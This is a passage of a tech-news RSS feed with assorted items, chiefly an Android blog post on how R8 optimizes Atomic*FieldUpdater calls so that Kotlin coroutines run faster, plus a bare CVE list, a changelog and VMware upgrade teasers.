CVE-2026-43275, CVE-2026-43277, CVE-2026-43279, CVE-2026-43281,
CVE-2026-43283, CVE-2026-43287, CVE-2026-43289, CVE-2026-43291,
CVE-2026-43295, CVE-2026-43296, CVE-2026-43302, CVE-2026-43312,
CVE-2026-43313, CVE-2026-43314, CVE-2026-43315, CVE-2026-43316,
CVE-2026-43324, CVE-2026-43327, CVE-2026-43328, CVE-2026-43329,
CVE-2026-43333, CVE-2026-43334, CVE-2026-43336, CVE-2026-43339,
CVE-2026-43340, CVE-2026-43342, CVE-2026-43343, CVE-2026-43357,
CVE-2026-43363, CVE-2026-43365, CVE-2026-43370, CVE-2026-43373,
CVE-2026-43380, CVE-2026-43381, CVE-2026-43382, CVE-2026-43386,
CVE-2026-43387, CVE-2026-43405, CVE-2026-43411, CVE-2026-43420,
CVE-2026-43425, CVE-2026-43426, CVE-2026-43427, CVE-2026-43428,
CVE-2026-43429, CVE-2026-43430, CVE-2026-43432, CVE-2026-43439,
CVE-2026-43445, CVE-2026-43449, CVE-2026-43450, CVE-2026-43451,
CVE-2026-43452, CVE-2026-43453, CVE-2026-43458, CVE-2026-43459,
CVE-2026-43466, CVE-2026-43469, CVE-2026-43472, CVE-2026-43473,
CVE-2026-43475, CVE-2026-43476, CVE-2026-43480, CVE-2026-43484,
CVE-2026-43496, CVE-2026-43497, CVE-2026-43502, CVE-2026-45834,
CVE-2026-45835, CVE-2026-45836, CVE-2026-45838, CVE-2026-45839,
CVE-2026-45840, CVE-2026-45841, CVE-2026-45842, CVE-2026-45843,
CVE-2026-45844, CVE-2026-45846, CVE-2026-45847, CVE-2026-45848,
CVE-2026-45852, CVE-2026-45856, CVE-2026-45857, CVE-2026-45860,
CVE-2026-45862, CVE-2026-45864, CVE-2026-45866, CVE-2026-45867,
CVE-2026-45868, CVE-2026-45869, CVE-2026-45870, CVE-2026-45871,
CVE-2026-45873, CVE-2026-45875, CVE-2026-45879, CVE-2026-45883,
CVE-2026-45885, CVE-2026-45890, CVE-2026-45891, CVE-2026-45899,
CVE-2026-45902, CVE-2026-45904, CVE-2026-45911, CVE-2026-45912,
CVE-2026-45915, CVE-2026-45916, CVE-2026-45919, CVE-2026-45920,
CVE-2026-45924, CVE-2026-45935, CVE-2026-45936, CVE-2026-45941,
CVE-2026-45946, CVE-2026-45948, CVE-2026-45954, CVE-2026-45956,
CVE-2026-45958, CVE-2026-45960, CVE-2026-45964, CVE-2026-45965,
CVE-2026-45968, CVE-2026-45969, CVE-2026-45970, CVE-2026-45974,
CVE-2026-45978, CVE-2026-45983, CVE-2026-45984, CVE-2026-45985,
CVE-2026-45986, CVE-2026-45987, CVE-2026-45994, CVE-2026-46002,
CVE-2026-46004, CVE-2026-46006, CVE-2026-46009, CVE-2026-46015,
CVE-2026-46018, CVE-2026-46019, CVE-2026-46022, CVE-2026-46023,
CVE-2026-46024, CVE-2026-46027, CVE-2026-46033, CVE-2026-46037,
CVE-2026-46040, CVE-2026-46044, CVE-2026-46046, CVE-2026-46047,
CVE-2026-46049, CVE-2026-46050, CVE-2026-46051, CVE-2026-46053,
CVE-2026-46062, CVE-2026-46064, CVE-2026-46070, CVE-2026-46072,
CVE-2026-46077, CVE-2026-46080, CVE-2026-46082, CVE-2026-46088,
CVE-2026-46098, CVE-2026-46099, CVE-2026-46101, CVE-2026-46102,
CVE-2026-46107, CVE-2026-46108, CVE-2026-46112, CVE-2026-46120,
CVE-2026-46122, CVE-2026-46123, CVE-2026-46124, CVE-2026-46127,
CVE-2026-46128, CVE-2026-46132, CVE-2026-46133, CVE-2026-46137,
CVE-2026-46146, CVE-2026-46149, CVE-2026-46150, CVE-2026-46151,
CVE-2026-46161, CVE-2026-46163, CVE-2026-46167, CVE-2026-46168,
CVE-2026-46172, CVE-2026-46174, CVE-2026-46177, CVE-2026-46178,
CVE-2026-46184, CVE-2026-46186, CVE-2026-46187, CVE-2026-46189,
CVE-2026-46197, CVE-2026-46198, CVE-2026-46205, CVE-2026-46206,
CVE-2026-46209, CVE-2026-46212, CVE-2026-46214, CVE-2026-46219,
CVE-2026-46220, CVE-2026-46227, CVE-2026-46230, CVE-2026-46231,
CVE-2026-46233, CVE-2026-46234, CVE-2026-46236, CVE-2026-46238,
CVE-2026-46249, CVE-2026-46250, CVE-2026-46253, CVE-2026-46259,
CVE-2026-46267, CVE-2026-46270, CVE-2026-46273, CVE-2026-46274,
CVE-2026-46275, CVE-2026-46285, CVE-2026-46294, CVE-2026-46301,
CVE-2026-46303, CVE-2026-46304, CVE-2026-46307, CVE-2026-46319,
CVE-2026-46328, CVE-2026-52911, CVE-2026-52912, CVE-2026-52914,
CVE-2026-52915, CVE-2026-52916, CVE-2026-52919, CVE-2026-52920,
CVE-2026-52921, CVE-2026-52922, CVE-2026-52925, CVE-2026-52926,
CVE-2026-52931, CVE-2026-52954, CVE-2026-52955, CVE-2026-52957,
CVE-2026-52958, CVE-2026-52962, CVE-2026-52963, CVE-2026-52969,
CVE-2026-52970, CVE-2026-52982, CVE-2026-52984, CVE-2026-52985,
CVE-2026-52986, CVE-2026-52992, CVE-2026-52993, CVE-2026-52995,
CVE-2026-52998, CVE-2026-52999, CVE-2026-53001, CVE-2026-53002,
CVE-2026-53003, CVE-2026-53004, CVE-2026-53006, CVE-2026-53011,
CVE-2026-53012, CVE-2026-53016, CVE-2026-53021, CVE-2026-53022,
CVE-2026-53023, CVE-2026-53037, CVE-2026-53039, CVE-2026-53040,
CVE-2026-53041, CVE-2026-53043, CVE-2026-53045, CVE-2026-53046,
CVE-2026-53047, CVE-2026-53048, CVE-2026-53049, CVE-2026-53050,
CVE-2026-53059, CVE-2026-53060, CVE-2026-53061, CVE-2026-53062,
CVE-2026-53064, CVE-2026-53065, CVE-2026-53068, CVE-2026-53069,
CVE-2026-53071, CVE-2026-53072, CVE-2026-53073, CVE-2026-53074,
CVE-2026-53075, CVE-2026-53077, CVE-2026-53082, CVE-2026-53088,
CVE-2026-53093, CVE-2026-53096, CVE-2026-53112, CVE-2026-53128,
CVE-2026-53130, CVE-2026-53287, CVE-2026-53291, CVE-2026-53294,
CVE-2026-53295, CVE-2026-53296, CVE-2026-53304, CVE-2026-53306,
CVE-2026-53309, CVE-2026-53320, CVE-2026-53369, CVE-2026-53379,
CVE-2026-63860, CVE-2026-63865, CVE-2026-64018, CVE-2026-64032,
CVE-2026-64033, CVE-2026-64034, CVE-2026-64039, CVE-2026-64046,
CVE-2026-64047, CVE-2026-64055, CVE-2026-64056, CVE-2026-64083,
CVE-2026-64084, CVE-2026-64085, CVE-2026-64086, CVE-2026-64087,
CVE-2026-64088, CVE-2026-64089, CVE-2026-64096, CVE-2026-64102,
CVE-2026-64103, CVE-2026-64113, CVE-2026-64114, CVE-2026-64115,
CVE-2026-64125, CVE-2026-64133, CVE-2026-64135, CVE-2026-64153,
CVE-2026-64155, CVE-2026-64164, CVE-2026-64165, CVE-2026-64166,
CVE-2026-64168, CVE-2026-64173, CVE-2026-64174, CVE-2026-64177,
CVE-2026-64178, CVE-2026-64179, CVE-2026-64185, CVE-2026-64218,
CVE-2026-64219, CVE-2026-64220, CVE-2026-64221)]]></content:encoded>
</item>
<item>
<title><![CDATA[GitHub: v1.18.9]]></title>
<description><![CDATA[Core
Bugfixes

Restored compatibility with legacy MCP SDK clients.

Desktop
Bugfixes

Fixed a Solid cleanup crash that could break navigation in the desktop app.
Fixed home session loading so the session list can update without suspending the whole page.

Improvements

Removed the extra vertical ...]]></description>
<link>https://tsecurity.de/de/3698681/downloads/github-v1189/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3698681/downloads/github-v1189/</guid>
<pubDate>Mon, 03 Aug 2026 00:12:37 +0200</pubDate>
<content:encoded><![CDATA[<div class="github-feed-entry"><h2>Core</h2>
<h3>Bugfixes</h3>
<ul>
<li>Restored compatibility with legacy MCP SDK clients.</li>
</ul>
<h2>Desktop</h2>
<h3>Bugfixes</h3>
<ul>
<li>Fixed a Solid cleanup crash that could break navigation in the desktop app.</li>
<li>Fixed home session loading so the session list can update without suspending the whole page.</li>
</ul>
<h3>Improvements</h3>
<ul>
<li>Removed the extra vertical borders from the V2 home projects view.</li>
<li>Added an opt-in V2 desktop sidecar backed by the bundled CLI service.</li>
<li>Added collapsible model provider sections in V2 settings.</li>
</ul>
<p><strong>Thank you to 1 community contributor:</strong></p>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roborew/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roborew">@roborew</a>:
<ul>
<li>fix(desktop): patch @dnd-kit/solid to preserve core scroll plugins (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4939877227" data-permission-text="Title is private" data-url="https://github.com/anomalyco/opencode/issues/38119" data-hovercard-type="pull_request" data-hovercard-url="/anomalyco/opencode/pull/38119/hovercard" href="https://github.com/anomalyco/opencode/pull/38119">#38119</a>)</li>
</ul>
</li>
</ul></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Modernizing Infrastructure: VMware Aria Automation 8.18.1 to VMware Cloud Foundation Automation 9.1 Upgrade Technical Deep Dive]]></title>
<description><![CDATA[Learn how the VMware Aria Automation 8.18.1 to VCF Automation 9.1 upgrade works under the hood, covering the Fleet Lifecycle architecture, each migration phase, and exactly what happens to your data and services throughout the transition. Overview Upgrading from VMware Aria Automation 8.18.1 to V...]]></description>
<link>https://tsecurity.de/de/3698621/downloads/modernizing-infrastructure-vmware-aria-automation-8181-to-vmware-cloud-foundation-automation-91-upgrade-technical-deep-dive/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3698621/downloads/modernizing-infrastructure-vmware-aria-automation-8181-to-vmware-cloud-foundation-automation-91-upgrade-technical-deep-dive/</guid>
<pubDate>Mon, 03 Aug 2026 00:12:01 +0200</pubDate>
<content:encoded><![CDATA[<div><img width="300" height="152" src="https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2026/05/165032308_l.jpg?w=300" class="attachment-medium size-medium wp-post-image" alt="" decoding="async" loading="lazy" srcset="https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2026/05/165032308_l.jpg 1170w, https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2026/05/165032308_l.jpg?resize=300,152 300w, https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2026/05/165032308_l.jpg?resize=768,389 768w, https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2026/05/165032308_l.jpg?resize=1024,519 1024w, https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2026/05/165032308_l.jpg?resize=600,304 600w" sizes="auto, (max-width: 300px) 100vw, 300px"></div>
<p>Learn how the VMware Aria Automation 8.18.1 to VCF Automation 9.1 upgrade works under the hood, covering the Fleet Lifecycle architecture, each migration phase, and exactly what happens to your data and services throughout the transition. Overview Upgrading from VMware Aria Automation 8.18.1 to VMware Cloud Foundation (VCF) Automation 9.1 is more than a version … <a href="https://blogs.vmware.com/cloud-foundation/2026/07/27/modernizing-infrastructure-vmware-aria-automation-8-18-1-to-vmware-cloud-foundation-automation-9-1-upgrade-technical-deep-dive/">Continued</a></p>
<p>The post <a href="https://blogs.vmware.com/cloud-foundation/2026/07/27/modernizing-infrastructure-vmware-aria-automation-8-18-1-to-vmware-cloud-foundation-automation-9-1-upgrade-technical-deep-dive/">Modernizing Infrastructure: VMware Aria Automation 8.18.1 to VMware Cloud Foundation Automation 9.1 Upgrade Technical Deep Dive</a> appeared first on <a href="https://blogs.vmware.com/cloud-foundation">VMware Cloud Foundation (VCF) Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Modernizing Infrastructure: VMware Cloud Foundation 9.0.x to 9.1 Upgrade Guide]]></title>
<description><![CDATA[With the release of VMware Cloud Foundation (VCF) 9.1, private cloud maturity has entered a highly programmatic, scalable era. Moving your infrastructure into this release represents more than a routine software lifecycle step, it is a transition into a modernized, modular architecture. Upgrading...]]></description>
<link>https://tsecurity.de/de/3698619/downloads/modernizing-infrastructure-vmware-cloud-foundation-90x-to-91-upgrade-guide/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3698619/downloads/modernizing-infrastructure-vmware-cloud-foundation-90x-to-91-upgrade-guide/</guid>
<pubDate>Mon, 03 Aug 2026 00:11:59 +0200</pubDate>
<content:encoded><![CDATA[<div><img width="300" height="152" src="https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2026/05/165032308_l.jpg?w=300" class="attachment-medium size-medium wp-post-image" alt="" decoding="async" loading="lazy" srcset="https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2026/05/165032308_l.jpg 1170w, https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2026/05/165032308_l.jpg?resize=300,152 300w, https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2026/05/165032308_l.jpg?resize=768,389 768w, https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2026/05/165032308_l.jpg?resize=1024,519 1024w, https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2026/05/165032308_l.jpg?resize=600,304 600w" sizes="auto, (max-width: 300px) 100vw, 300px"></div>
<p>With the release of VMware Cloud Foundation (VCF) 9.1, private cloud maturity has entered a highly programmatic, scalable era. Moving your infrastructure into this release represents more than a routine software lifecycle step, it is a transition into a modernized, modular architecture. Upgrading to VCF 9.1 eliminates the overhead of managing separate appliances for Lifecycle … <a href="https://blogs.vmware.com/cloud-foundation/2026/07/28/modernizing-infrastructure-vmware-cloud-foundation-9-0-x-to-9-1-upgrade-guide/">Continued</a></p>
<p>The post <a href="https://blogs.vmware.com/cloud-foundation/2026/07/28/modernizing-infrastructure-vmware-cloud-foundation-9-0-x-to-9-1-upgrade-guide/">Modernizing Infrastructure: VMware Cloud Foundation 9.0.x to 9.1 Upgrade Guide</a> appeared first on <a href="https://blogs.vmware.com/cloud-foundation">VMware Cloud Foundation (VCF) Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How R8 made Kotlin Coroutines on Android 2x faster]]></title>
<description><![CDATA[Posted by Andrei Shikov, Senior Software Engineer, Android Toolkit and Jonathan Starup, Software Engineer, R8 Team

Starting from AGP 9.2.0, R8 optimizes most Atomic*FieldUpdater calls into Unsafe variants that perform 2x to 4x better on common operations. This has a particularly large impact on ...]]></description>
<link>https://tsecurity.de/de/3698550/android-tipps/how-r8-made-kotlin-coroutines-on-android-2x-faster/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3698550/android-tipps/how-r8-made-kotlin-coroutines-on-android-2x-faster/</guid>
<pubDate>Mon, 03 Aug 2026 00:10:44 +0200</pubDate>
<content:encoded><![CDATA[
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHiv_LIAZ9QEJ4RWJSvZphTWmkDaVoseyWsbSPkfJDKd0DXjq53xtLOMiVtTEzlW6dAwXUlcucsBDKxjp9MjET4MB1b4ymZkd-b7jhm-PczdvyFqQCpZ39MXVjaVrWg4Y6WD4KLYOL3PbmYBDumMULpZQDX0052163RVUWZnfUAUPFtfwZMVflqjT9AnQ/s2469/0707%20Faster%20Kotlin%20coroutines%20on%20Android%20with%20R8_Meta.png"><i>Posted by Andrei Shikov, Senior Software Engineer, Android Toolkit and Jonathan Starup, Software Engineer, R8 Team</i><div><i><br></i></div><div><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYQ0hvP8noS5d46xLL2ca89fUyDM7ONaSVUIn8QhZxuB8GKNdGi_IIQNt3c8dAT67nO1TMfcPrmXMXfBjggYafmHV6cYH86vFyoEnIEgaFJ2uOYQIH4l9zA4GlQvduoJEVUNzIUX1qJmaxY3qRGn9TKwuRD_HR87trMxuaU0x29FXcx7Pr-DdP0ZhxZhQ/s8582/0707%20Faster%20Kotlin%20coroutines%20on%20Android%20with%20R8_Blog.png"><img border="0" data-original-height="2601" data-original-width="8582" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYQ0hvP8noS5d46xLL2ca89fUyDM7ONaSVUIn8QhZxuB8GKNdGi_IIQNt3c8dAT67nO1TMfcPrmXMXfBjggYafmHV6cYH86vFyoEnIEgaFJ2uOYQIH4l9zA4GlQvduoJEVUNzIUX1qJmaxY3qRGn9TKwuRD_HR87trMxuaU0x29FXcx7Pr-DdP0ZhxZhQ/s1600/0707%20Faster%20Kotlin%20coroutines%20on%20Android%20with%20R8_Blog.png"></a></div><br><i><br></i><p><br></p><br><p></p><p></p></div>

<p>Starting from AGP 9.2.0, R8 optimizes most <code>Atomic*FieldUpdater</code> calls into <code>Unsafe</code> variants that perform <a href="https://github.com/Kotlin/kotlinx.coroutines/issues/3950">2x to 4x better on common operations</a>. This has a particularly large impact on the kotlinx.atomicfu library that implements atomics for <code>kotlinx.coroutines</code>, making launching and cancelling coroutines up to 2x faster. In order to get the benefits, update your AGP to 9.2.0 or above.</p>

<p>With the majority of Android apps adopting Kotlin as their main language of choice, <code><a href="https://github.com/Kotlin/kotlinx.coroutines" target="_blank">kotlinx.coroutines</a></code> has become a de-facto standard for asynchronous programming. The library offers a well-designed and structured way of managing concurrent flows that is native to Kotlin. Jetpack Compose was no exception, adopting coroutines for managing pointer events, animations and other interactions. At the time of writing, most concurrent APIs in Compose call <code>suspend</code> functions under the hood and are launching and/or cancelling coroutines to handle updates.</p>

<p>As the Compose team started to investigate performance, coroutines were discovered to be a bottleneck for many operations that happen outside of composition. As an example, 80% of the time spent on creating and updating <code>Modifier.clickable</code> was consumed by launching and cancelling internal coroutines that handled <code>InteractionSource</code> updates. Based on those observations, much of early performance work was focused on removing coroutines from the default path and delaying initialization until necessary.</p>

<h2>The cost of a coroutine</h2>

<p>The easiest way to analyze a function's internal behavior on Android is to capture an Android Runtime (ART) method trace. An ART method trace is a tool that records the execution flow of an app, showing exactly which methods are called, their order, and how much time is spent in each, allowing developers to identify performance bottlenecks. For an empty <code>LaunchedEffect { }</code> call, it would look something like this: </p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtNkPVicdJLFrYlTBtffjL73QsWm8LztGzRCLSVrzpHy-FiyMEcOIJPkDYAjUKI0ZAgQDgATjjZXIcmjZlf7iusLjC9E5F6GaIPMvZbTh1hP4N7OsnUPgkz5atS5PcsrPh5ulpSAqJ9K8T6eviqTwy4NB5zMu8HAnBZgK2PaZwX3ajJFXSRuoH35T4TZk/s7680/pic01_enhanced.png"><img border="0" data-original-height="3432" data-original-width="7680" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtNkPVicdJLFrYlTBtffjL73QsWm8LztGzRCLSVrzpHy-FiyMEcOIJPkDYAjUKI0ZAgQDgATjjZXIcmjZlf7iusLjC9E5F6GaIPMvZbTh1hP4N7OsnUPgkz5atS5PcsrPh5ulpSAqJ9K8T6eviqTwy4NB5zMu8HAnBZgK2PaZwX3ajJFXSRuoH35T4TZk/s1600/pic01_enhanced.png"></a></div><p><i>LaunchedEffect method trace visualized in the Perfetto UI</i></p>

<p>The method trace above can be separated into three parts:<br></p><ul><li>
Initializing a new coroutine</li><li>
Starting coroutine</li><li>
Completing coroutine (because it exits immediately)</li></ul><p></p>

<p>Cancelling <code>LaunchedEffect</code> is similar to normal completion, except it also creates a <code>CancellationException</code>.</p>

<p>From the profile above, one thing that is immediately suspicious is frequent calls into <code>java.util.concurrent.AtomicReferenceFieldUpdater</code> (purple or green boxes with j… labels). While each call is relatively fast, the frequency is concerning; any non-negligible overhead that is spread out across multiple invocations might add up to a noticeable regression. Zooming in on a call reveals that most of the time is spent on... reflection checks?</p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirqmZk8TeN6KsUrqnCFT_AigbT3IdjfMDxabgQEM7izThyphenhyphenubMyvsFzkd3zR6SSxfvovJb5QeaoeIYPG9pFoNCegLDizYwfTOnKFv9sWfp1whDlFB9gUf3VMS9qU2-smyKEHrmsrPlN4htYxmLQ3yGfgZlWzjpwi6nTXbTcghvutTmJQjSo2s9c8xG-LOM/s13034/pic02-enhanced.png"><img border="0" data-original-height="4102" data-original-width="13034" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirqmZk8TeN6KsUrqnCFT_AigbT3IdjfMDxabgQEM7izThyphenhyphenubMyvsFzkd3zR6SSxfvovJb5QeaoeIYPG9pFoNCegLDizYwfTOnKFv9sWfp1whDlFB9gUf3VMS9qU2-smyKEHrmsrPlN4htYxmLQ3yGfgZlWzjpwi6nTXbTcghvutTmJQjSo2s9c8xG-LOM/s1600/pic02-enhanced.png"></a></div><br><p><br></p>

<p><i>An up-close look at the method trace of AtomicReferenceFieldUpdater.get during LaunchedEffect initialization</i></p>

<p>Coroutines implement a lock-free tree structure for parent-child relationships that makes structured concurrency possible. Turns out, the <code>kotlinx.atomicfu</code> library implements lock-free atomic operations using a well-known JVM primitive, <code><a href="https://docs.oracle.com/javase/8/docs/api/java/util/concurrent/atomic/AtomicReferenceFieldUpdater.html" target="_blank">AtomicReferenceFieldUpdater</a></code>. The updater uses a class reference and a field name to perform atomic operations at runtime, and it has to run several reflective safety checks to make sure the field exists and is accessible. Each operation in coroutines (starting, suspending, cancelling, completing) calls at least one atomic operation, so if it is slow, coroutines will not perform well.</p>

<h2>Investigating AtomicReferenceFieldUpdater</h2>

<p>But let's not get ahead of ourselves. <code>AtomicReferenceFieldUpdater</code> is actually well-optimized on JVM <a href="https://shipilev.net/blog/2015/faster-atomic-fu/">for over 10 years now</a>, and method traces might capture overhead that is completely removed by a VM level optimization: just-in-time (JIT) or ahead-of-time (AOT) compilations. To verify performance, let's write a few benchmarks to measure the difference between atomic references from <code>kotlinx.atomicfu</code> and <code>java.util.concurrent.atomic</code>.</p>

<pre><code>@RunWith(AndroidJUnit4::class)
class AtomicReferenceBenchmark {
    @get:Rule
    val benchmarkRule = BenchmarkRule()
    
    private val atomicReference = java.util.concurrent.atomic.AtomicReference(false)
    private val atomicRef = kotlinx.atomicfu.atomic&lt;Boolean&gt;(false)
    
    @Test
    fun atomicReference_compareAndSet() {
        benchmarkRule.measureRepeated { 
            atomicReference.compareAndSet(true, false)
            atomicReference.compareAndSet(false, true)
        }
    }

     @Test
    fun atomicRef_compareAndSet() {
        benchmarkRule.measureRepeated {
            atomicRef.compareAndSet(true, false)
            atomicRef.compareAndSet(false, true)
        }
    }

    /* measuring other methods from the method traces above */
}</code></pre>

<p>Running this benchmark on a Pixel 5 (while ensuring <code>AtomicReferenceFieldUpdater#compareAndSet</code> is JIT compiled during warmup), yields the following results on Pixel 5 (API 33):<br>
</p><pre><code> 50.7 ns  atomicReference_compareAndSet
135   ns  atomicRef_compareAndSet
</code></pre>

<p>The measurements confirm the gap, with <code>kotlinx.atomicfu</code> version clearly being approximately 2.7x slower. This confirms that ART does not perform any hidden optimization and reflective access checks add real overhead during runtime.</p>

<p>Looking back at the original method trace, the only meaningful work performed by the <code>AtomicReferenceFieldUpdater</code> is the internal call into <code>Unsafe.getObjectVolatile</code> that actually executes the underlying atomic operation. In most cases, the updater initializer is static, and can be proved to be always correct based on the structure of the surrounding class. Thus, one could statically analyze most of the <code>AtomicReferenceFieldUpdater</code> usages and replace them with an internal <code>Unsafe</code> variant during compilation. It also just happens that Android build toolchain has its very own optimizing compiler that can do exactly that.</p>

<h2>Optimization with R8</h2>

<p>The <code>Atomic*FieldUpdater</code> classes support subtle, dynamic and reflection-based use,  but are often used in statically obvious patterns. This both explains the slow baseline performance and the want for optimization. R8 is a full-program optimizing compiler and is well-suited to see through the simpler patterns to skim the overhead of the reflective safety checks. R8 receives JVM bytecode after the Java or the Kotlin compiler, but to ease readability these examples are presented in Java syntax. This is why there are no type arguments for <code>AtomicReferenceFieldUpdater</code>.</p>

<pre><code>class Example {
    volatile String data = "";
    static final AtomicReferenceFieldUpdater updater =
        AtomicReferenceFieldUpdater.newUpdater(Example.class, String.class, "data");

    void example() {
        // ...
        updater.compareAndSet(this, "", "new");
        // ...
    }
}</code></pre>

<p>The base example creates a static final updater which accesses a volatile field with simple constant arguments for the holder, the type, and the name of the field. The reflection used is totally transparent. It is clear to see this updater references a valid field and that the site of the updater creation has valid access to the field.</p>

<p>In its essence, <code>Atomic*FieldUpdater</code> is a wrapper around a field offset and calls to <code>Unsafe</code>. The best case scenario for the optimization is to replace the updater field with an offset field and replace the updater calls with calls to <code>Unsafe</code>.</p>

<h3>Optimizing Atomic*FieldUpdater</h3>

<p>The optimization is implemented in three parts: Instrumentation, Replacement, and Clean-up.</p>

<h2>Instrumentation</h2>

<p>The first step is to introduce offset fields alongside the updater field in order to facilitate direct access via the <code>Unsafe</code> call.</p>

<pre><code>static final long updater$offset =
    SyntheticUnsafe.UNSAFE.objectFieldOffset(Example.class.getDeclaredField("data"))</code></pre>

<p>The field is accessed via reflection, and <code>Unsafe</code> is used to extract the field offset on the class. This code represents the internals of <code>Atomic*FieldUpdater</code> if you disregard reflection validation. Instead, the holder type of the updater and the field type of the volatile field are tracked statically in the compiler.</p>

<p>Note that the original field and its initialization are left as-is. The optimization process optimistically facilitates and optimizes uses and then later cleans up. This is a simple approach to the implementation but also allows partial optimization of updater fields, where some uses are left as they were while others are optimized.</p>

<h2>Replacement</h2>

<p>At this point in the compiler, after a suitable concurrency join point, we have a list of instrumented updater fields. This means that we can optimize each call site individually based on a few conditions. Consider an example call:</p>

<pre><code>updater.compareAndSet(holder, expectedValue, newValue);</code></pre>

<p>The conditions that <code>Atomic*FieldUpdater</code> requires are these:<br></p><ul><li>
  Does <code>updater</code> come from an instrumented field? That is, can static analysis track the value of the object back to a field read of an instrumented updater?</li><li>
  Is <code>holder</code> the same class or a subclass of the originally defined holder type?</li><li>
  Is <code>newValue</code> the same class or a subclass of the originally defined field type?</li></ul>
  If all conditions are met, then the call is replaced by a call to <code>Unsafe</code> without any of the reflection checks.<p></p>

<pre><code>SyntheticUnsafe.UNSAFE.compareAndSwapObject(holder, Example.updater$offset, expectedValue, newValue)</code></pre>

<p>This new call is faster and simpler but it differs from the original call in regards to its handling of null values in <code>updater</code> and <code>holder</code>. Unless statically ruled out, null-checks are inserted for both.</p>

<h2>Clean-up</h2>

<p>At this point, the holding class has the original updater field and the new offset field along with call sites that might use either one of the two. If  none of the call sites were optimized, then the offset field should be removed and if all of the call sites were optimized, then the updater field should be removed. In both cases the initializing call should also be deleted. The deletion of unused fields and removal of dead code is already done in the compiler, but removing the initializing code here requires a few more tricks.</p>

<p>Both the call to <code>newUpdater</code> and <code>getDeclaredField</code> might have side effects as they can throw exceptions (and their implementation is also unknown since it depends on the API version). This means that by generic optimization, they cannot safely be removed. So this clean-up required explicit consideration of the instrumented fields, since those are statically known to be free of exceptions.</p>

<p>In the end, the simple updater example shown above looks like this after optimization:</p>

<pre><code>class Example {
    volatile String data = "";
    static final long updater$offset =
        SyntheticUnsafe.UNSAFE.objectFieldOffset(Example.class.getDeclaredField("data"))

    void example() {
        // ...
        SyntheticUnsafe.UNSAFE.compareAndSwapObject(this, Example.updater$offset, "", "new")
        // ...
    }
}</code></pre>

<h3>Results</h3>

<p>After these optimizations, <code>kotlinx.atomicfu</code> and most explicit uses of <code>AtomicInt/Long/ReferenceFieldUpdater</code> now match <code>AtomicReference</code> performance with R8 applied. In fact, it is even faster in some benchmarks; <code>kotlinx.atomicfu</code> has a compiler plugin that can inline <code>atomic</code> instances into fields, reducing allocations required to create an atomically updated field.</p>

<p>Jetpack Compose was the main beneficiary of this work. Compose runtime has a number of microbenchmarks that track coroutine performance very closely to catch performance regressions early. When the benchmarks were updated to a new version of R8, we noticed a 2x improvement when launching and cancelling coroutines in <code>LaunchedEffect</code>!</p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5VYYOudfoQzHlELVMmmiLkRxUd80bqzqB8ykvBedO0VpCROTeK63gXhyphenhyphenYZWed99FWOFl58qqj34aQP9GLPJGW_Ls2w5ez0o-TIOqdt9hlIn5NFmpT7N83sKuhnCdbazdVSFcz0h2e4Zu12GCaW_ss9t-7v7t9J26WgqKpIWUyCkKz4X8L95H2fYjA6i0/s9600/pic03_enhanced.png"><img border="0" data-original-height="5580" data-original-width="9600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5VYYOudfoQzHlELVMmmiLkRxUd80bqzqB8ykvBedO0VpCROTeK63gXhyphenhyphenYZWed99FWOFl58qqj34aQP9GLPJGW_Ls2w5ez0o-TIOqdt9hlIn5NFmpT7N83sKuhnCdbazdVSFcz0h2e4Zu12GCaW_ss9t-7v7t9J26WgqKpIWUyCkKz4X8L95H2fYjA6i0/s1600/pic03_enhanced.png"></a></div><br><p><br></p>

<div><i>Benchmark graph illustrating the time taken when starting and cancelling coroutines in LaunchedEffect (lower is better). The change in the graph corresponds to an R8 update, showcasing 2x improvement.</i></div>

<p>Aside from that, the ART team is implementing these optimizations natively at the VM level. If your app is targeting API 37 and is running on a recent version of Android, it is possible that your device is already optimizing coroutines in a similar way. The coroutine benchmarks above observed ~15% improvement in performance after JIT updates in the recent versions of ART.</p>

<p>Your app will receive this optimization by default when upgrading to AGP 9.2.0 or by using R8 9.2.0 directly. For more information, see <a href="https://r8.googlesource.com/r8/+/refs/heads/main/README.md#replacing-r8-in-agp" target="_blank">D8 dexer and R8 shrinker</a>.</p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[A cheap ergonomic mouse just showed me what the MX Vertical has been missing all along (and exposed its biggest flaw)]]></title>
<description><![CDATA[The ProtoArc EM11 Pro nails horizontal scrolling and quiet clicking, but its awkward grip keeps the Logitech MX Vertical on my desk.]]></description>
